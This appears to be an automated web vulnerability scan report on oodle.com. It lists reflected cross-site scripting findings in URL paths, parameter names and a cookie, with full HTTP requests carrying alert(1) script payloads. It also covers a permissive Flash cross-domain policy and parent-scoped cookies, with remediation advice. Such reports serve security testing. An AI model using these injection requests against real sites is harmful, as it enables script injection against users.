GET /pro/registere2636"><script>alert(1)</script>e02086d22ce/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:17 GMT Content-Length: 12663 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExNzt9; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae3c"-alert(1)-"3e83c21a4d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro/registerdae3c"-alert(1)-"3e83c21a4d0/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:19 GMT Content-Length: 12639 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExOTt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39333"-alert(1)-"91e8db65e28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions39333"-alert(1)-"91e8db65e28/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:02 GMT Content-Length: 23740 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE2Mjt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa7c"><script>alert(1)</script>377b802a9b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /regionsdfa7c"><script>alert(1)</script>377b802a9b8/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:00 GMT Content-Length: 23775 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE2MDt9; path=/; domain=.oodle.com
1.57. http://www.oodle.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82295"-alert(1)-"3eb30faf7aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/?82295"-alert(1)-"3eb30faf7aa=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:48 GMT Content-Length: 22341 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE0Nzt9; path=/; domain=.oodle.com
1.58. http://www.oodle.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77807"><script>alert(1)</script>92759392d7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /regions/?77807"><script>alert(1)</script>92759392d7c=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:46 GMT Content-Length: 22408 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE0Njt9; path=/; domain=.oodle.com
The value of the ots cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c71"><script>alert(1)</script>574cba45ff6 was submitted in the ots cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /browse/-/social_circle_all/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1da5c71"><script>alert(1)</script>574cba45ff6; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response (redirected)
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:27:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDg2Mjt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToyOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9aToxO2E6Njp7czozOiJsb2MiO3M6MTM6InVzYTp0eDpkYWxsYXMiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE4IjtzOjk6ImNpdHlfY29kZSI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJvcmlnaW4iO3M6NToiY2FjaGUiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 228435
The value of the ots cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e470"><script>alert(1)</script>0f20ec69ff6 was submitted in the ots cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /browse_redir/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d9e470"><script>alert(1)</script>0f20ec69ff6; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response (redirected)
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:27:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDgzMjt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToyOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9aToxO2E6Njp7czozOiJsb2MiO3M6MTM6InVzYTp0eDpkYWxsYXMiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE4IjtzOjk6ImNpdHlfY29kZSI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJvcmlnaW4iO3M6NToiY2FjaGUiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 228433
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.oodle.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT ETag: "1248d65-ca-44832e564dd40" Content-Type: application/xml Date: Sat, 19 Mar 2011 13:46:31 GMT Content-Length: 202 Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:46:31 GMT Connection: close Vary: Accept-Encoding Set-Cookie: otu=3d12132d80c3c544a5609c16de5eb5e0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=5c0593f4a30245fa5b12e2d4ff9a60c3; path=/; domain=.oodle.com Set-Cookie: a=dT1CNDk1N0FDODREODRCM0I3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM5MTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 55586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/-/social_circle_all/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Location: http://www.oodle.com/browse/ Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:30 GMT Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzMDt9; path=/; domain=.oodle.com Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /browse_redir/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
